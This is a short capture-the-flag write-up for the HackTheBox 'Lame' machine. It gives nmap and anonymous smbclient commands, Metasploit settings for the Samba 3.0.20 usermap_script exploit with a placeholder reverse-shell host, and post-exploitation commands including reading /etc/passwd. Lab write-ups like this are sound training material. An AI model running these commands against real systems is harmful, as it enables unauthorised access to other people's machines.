![HackTheBox [Lame]](/_next/image?url=%2Fimages%2Flame_k.png&w=3840&q=75)
This box was xyx
🧽 Initial Reconnaissance
To begin the assessment, I started with an aggressive port scan using nmap.
nmap -p- -A 10.10.10.3🔍 SMB Enumeration
Using
smbclient<Code>smbclient -L \\10.10.10.3\ -N</Code>
<Code>smbclient \\10.10.10.3\anonymous -N</Code>
💥 Exploitation
<Code> searchsploit samba 3.0.20 msfconsole use exploit/multi/samba/usermap_script set RHOSTS 10.10.10.3 set LHOST YOUR_IP run </Code>✅ Post Exploitation
<Code> {`whoami hostname cat /etc/passwd`} </Code>🧠 Lessons Learned
This box was a great reminder that basic recon goes a long way.
A misconfigured SMB share and outdated Samba version were all it took to get root access.